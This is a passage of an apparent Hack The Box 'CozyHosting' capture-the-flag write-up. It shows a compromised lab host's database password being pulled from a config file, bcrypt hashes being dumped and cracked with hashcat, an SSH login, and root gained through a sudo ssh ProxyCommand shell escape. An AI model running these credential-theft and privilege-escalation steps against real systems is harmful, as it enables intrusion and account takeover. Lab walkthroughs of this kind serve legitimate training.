inflating: /tmp/cloudhosting/BOOT-INF/classes/templates/index.html
inflating: /tmp/cloudhosting/BOOT-INF/classes/templates/admin.html
inflating: /tmp/cloudhosting/BOOT-INF/classes/templates/login.html
inflating: /tmp/cloudhosting/BOOT-INF/classes/application.properties
inflating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.xml
inflating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.properties
creating: /tmp/cloudhosting/BOOT-INF/lib/
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-session-core-3.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-jcl-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-autoconfigure-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/logback-classic-1.4.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/logback-core-1.4.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/log4j-to-slf4j-2.19.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/log4j-api-2.19.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jul-to-slf4j-2.0.6.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.annotation-api-2.1.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/snakeyaml-1.33.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-actuator-autoconfigure-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-actuator-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-databind-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-annotations-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-core-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-datatype-jsr310-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/micrometer-observation-1.10.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/micrometer-commons-1.10.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/micrometer-core-1.10.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/HdrHistogram-2.1.12.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/LatencyUtils-2.0.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-aop-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-beans-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-config-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-context-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-web-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-expression-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/thymeleaf-spring6-3.1.1.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/thymeleaf-3.1.1.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/attoparser-2.0.6.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/unbescape-1.1.6.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-datatype-jdk8-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-module-parameter-names-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/tomcat-embed-core-10.1.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/tomcat-embed-el-10.1.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/tomcat-embed-websocket-10.1.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-web-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-webmvc-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/thymeleaf-extras-springsecurity6-3.1.1.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/slf4j-api-2.0.6.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/aspectjweaver-1.9.19.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/HikariCP-5.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-jdbc-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/hibernate-core-6.1.6.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.persistence-api-3.1.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.transaction-api-2.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jboss-logging-3.5.0.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/hibernate-commons-annotations-6.0.2.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jandex-2.4.2.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/classmate-1.5.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/byte-buddy-1.12.22.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jaxb-runtime-4.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jaxb-core-4.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/angus-activation-1.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/txw2-4.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/istack-commons-runtime-4.1.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.inject-api-2.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/antlr4-runtime-4.10.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-data-jpa-3.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-data-commons-3.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-orm-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-tx-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-aspects-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/lombok-1.18.26.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/postgresql-42.5.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/checker-qual-3.5.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.xml.bind-api-4.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.activation-api-2.1.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-core-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-core-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-crypto-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-jarmode-layertools-3.0.2.jar
inflating: /tmp/cloudhosting/BOOT-INF/classpath.idx
inflating: /tmp/cloudhosting/BOOT-INF/layers.idx
Find all files: *.properties
app@cozyhosting:/app$ find /tmp/cloudhosting -name "*.properties" 2>/dev/null
find /tmp/cloudhosting -name "*.properties" 2>/dev/null
/tmp/cloudhosting/BOOT-INF/classes/application.properties
/tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.properties
Read all files: *.properties
Found interesing info
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxRapp@cozyhosting:/app$
---
app@cozyhosting:/app$ cat /tmp/cloudhosting/BOOT-INF/classes/application.properties
<loudhosting/BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxRapp@cozyhosting:/app$
app@cozyhosting:/app$ cat /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.properties
</maven/htb.cloudhosting/cloudhosting/pom.properties
artifactId=cloudhosting
groupId=htb.cloudhosting
version=0.0.1
app@cozyhosting:/app$
Get creds from database postgres
app@cozyhosting:/app$ ss -tulpn
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 244 127.0.0.1:5432 0.0.0.0:*
tcp LISTEN 0 100 [::ffff:127.0.0.1]:8080 *:* users:(("java",pid=1060,fd=19))
tcp LISTEN 0 128 [::]:22 [::]:*
app@cozyhosting:/app$
app@cozyhosting:/app$ psql -h 127.0.0.1 -U postgres
psql -h 127.0.0.1 -U postgres
Password for user postgres: Vg&nvzAQ7XxR
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=# \list
\list
WARNING: terminal is not fully functional
Press RETURN to continue
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privil
eges
-------------+----------+----------+-------------+-------------+----------------
-------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
(4 rows)
(END)
(END)
(END)q
postgres=#
postgres=# \connect cozyhosting
\connect cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=#
cozyhosting=# \dt
\dt
WARNING: terminal is not fully functional
Press RETURN to continue
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)
(END)
(END)q
cozyhosting=#
cozyhosting=# select * from users;
select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue
name | password | role
-----------+--------------------------------------------------------------+-----
--
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
n
(2 rows)
Cracking hash for user: admin
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
Analyzing '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ hashcat -m 3200 admin.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-Intel(R) Core(TM) i7-8850H CPU @ 2.60GHz, 4295/8654 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sat Aug 10 21:49:55 2024 (2 mins, 36 secs)
Time.Estimated...: Sat Aug 10 21:52:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18 H/s (5.57ms) @ Accel:2 Loops:32 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2796/14344384 (0.02%)
Rejected.........: 0/2796 (0.00%)
Restore.Point....: 2792/14344384 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:992-1024
Candidate.Engine.: Device Generator
Candidates.#1....: andrea1 -> charley
Hardware.Mon.#1..: Util: 0%
Started: Sat Aug 10 21:49:13 2024
Stopped: Sat Aug 10 21:52:34 2024
SSH login as: josh
L: josh
P: manchesterunited
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Aug 10 09:56:59 PM UTC 2024
System load: 0.376953125
Usage of /: 53.7% of 5.42GB
Memory usage: 12%
Swap usage: 0%
Processes: 265
Users logged in: 0
IPv4 address for eth0: 10.10.11.230
IPv6 address for eth0: dead:beef::250:56ff:fe94:cbf
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$
Read flag: user.txt
josh@cozyhosting:~$ find / -name "user.txt" 2>/dev/null
/home/josh/user.txt
josh@cozyhosting:~$
josh@cozyhosting:~$ cd /home/josh
josh@cozyhosting:~$
josh@cozyhosting:~$ ls -la
total 36
drwxr-x--- 3 josh josh 4096 Aug 8 2023 .
drwxr-xr-x 3 root root 4096 May 18 2023 ..
lrwxrwxrwx 1 root root 9 May 11 2023 .bash_history -> /dev/null
-rw-r--r-- 1 josh josh 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 josh josh 3771 Jan 6 2022 .bashrc
drwx------ 2 josh josh 4096 May 18 2023 .cache
-rw------- 1 josh josh 20 May 18 2023 .lesshst
-rw-r--r-- 1 josh josh 807 Jan 6 2022 .profile
lrwxrwxrwx 1 root root 9 May 21 2023 .psql_history -> /dev/null
-rw-r----- 1 root josh 33 Aug 10 21:55 user.txt
-rw-r--r-- 1 josh josh 39 Aug 8 2023 .vimrc
josh@cozyhosting:~$ cat user.txt ; id ; ip a
6d173ef50d9e25615bcb0e866f4d5413
uid=1003(josh) gid=1003(josh) groups=1003(josh)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:0c:bf brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.230/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:cbf/64 scope global dynamic mngtmpaddr
valid_lft 86392sec preferred_lft 14392sec
inet6 fe80::250:56ff:fe94:cbf/64 scope link
valid_lft forever preferred_lft forever
josh@cozyhosting:~$
Privilege Escalation
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
josh@cozyhosting:~$
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
#
# id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt
# cd /root
#
# ls -la
total 40
drwx------ 5 root root 4096 Aug 10 21:55 .
drwxr-xr-x 19 root root 4096 Aug 14 2023 ..
lrwxrwxrwx 1 root root 9 May 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 2 root root 4096 Aug 8 2023 .cache
-rw------- 1 root root 56 Aug 14 2023 .lesshst
drwxr-xr-x 3 root root 4096 May 11 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
lrwxrwxrwx 1 root root 9 May 18 2023 .psql_history -> /dev/null
-rw-r----- 1 root root 33 Aug 10 21:55 root.txt
drwx------ 2 root root 4096 May 9 2023 .ssh
-rw-r--r-- 1 root root 39 Aug 8 2023 .vimrc
#
# cat root.txt ; id ; ip a
0096e75f6864d7eaf5dad4c06ea52ec9
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:0c:bf brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.230/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:cbf/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:fe94:cbf/64 scope link
valid_lft forever preferred_lft forever
#
References
[GTFOBins - SSH](https://gtfobins.github.io/gtfobins/ssh/#sudo)
Lessons Learned